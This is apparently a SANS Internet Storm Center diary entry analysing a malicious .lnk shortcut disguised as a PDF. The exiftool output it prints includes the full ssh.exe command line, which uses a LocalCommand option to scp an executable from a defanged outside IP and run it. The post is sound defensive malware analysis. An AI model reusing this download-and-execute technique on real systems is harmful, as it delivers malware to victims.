Christmas is at our doors and Attackers use the holiday season to deliver always more and more gifts into our mailboxes! I found this interesting file this morning: “christmas_slab.pdf.lnk”[1]. Link files (.lnk) are a classic way to execute something malicious on the victim’s computer but the technique used here is interesting.
For a while, Microsoft added SSH support to Windows. I remember the first time I typed “ssh” into a command line and I did not get the wonderful message:
‘ssh’ is not recognized as an internal or external command
Because ssh is avaiable on many computers today, Attackers have a new way to deliver more malicious content using the SSH (read: SCP) protocol. That’s the technique used by today’s LNK file:
remnux@remnux:/MalwareZoo/20241220$ exiftool christmas_slab.pdf.lnk
ExifTool Version Number : 12.76
File Name : christmas_slab.pdf.lnk
Directory : .
File Size : 1992 bytes
File Modification Date/Time : 2024:12:20 05:39:50-05:00
File Access Date/Time : 2024:12:20 05:39:50-05:00
File Inode Change Date/Time : 2024:12:20 05:39:50-05:00
File Permissions : -rwx——
File Type : LNK
File Type Extension : lnk
MIME Type : application/octet-stream
Flags : IDList, LinkInfo, RelativePath, WorkingDir, CommandArgs, Unicode, TargetMetadata
File Attributes : Archive
Create Date : 2024:10:09 05:37:10-04:00
Access Date : 2024:11:05 07:47:23-05:00
Modify Date : 2024:10:09 05:37:10-04:00
Target File Size : 1243648
Icon Index : (none)
Run Window : Normal
Hot Key : (none)
Target File DOS Name : ssh.exe
Drive Type : Fixed Disk
Drive Serial Number : 280C-1822
Volume Label :
Local Base Path : C:WindowsSystem32OpenSSHssh.exe
Relative Path : ……WindowsSystem32OpenSSHssh.exe
Working Directory : C:Program Files (x86)MicrosoftEdgeApplication
Command Line Arguments : -o “PermitLocalCommand=yes” -o “StrictHostKeyChecking=no” -o “LocalCommand=scp root@17[.]43[.]12[.]31:/home/revenge/christmas-sale.exe c:userspublic. && c:userspublicchristmas-sale.exe” revenge@17[.]43[.]12[.]31
Machine ID : christmas-destr
This LNK file will spawn a ssh.exe that will transfer a PE file and execute it. Note the nice executable filename! Once started, the same IP address + username is passed as a parameter to the malicious payload. Unfortunately, the SSH server is down and I wasn’t able to retried the file.
Somethign else suspicious, the IP belows to Apple:
NetRange: 17.0.0.0 – 17.255.255.255
CIDR: 17.0.0.0/8
NetName: APPLE-WWNET
NetHandle: NET-17-0-0-0-1
Parent: ()
NetType: Direct Allocation
OriginAS:
Organization: Apple Inc. (APPLEC-1-Z)
RegDate: 1990-04-16
Updated: 2023-11-15
Comment: Geofeed https://ip-geolocation.apple.com
Ref: https://rdap.arin.net/registry/ip/17.0.0.0
I discovered this file because I started to track the usage of “ssh.exe” in my hunting rules. Let’s hope I will get more hits soon!
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.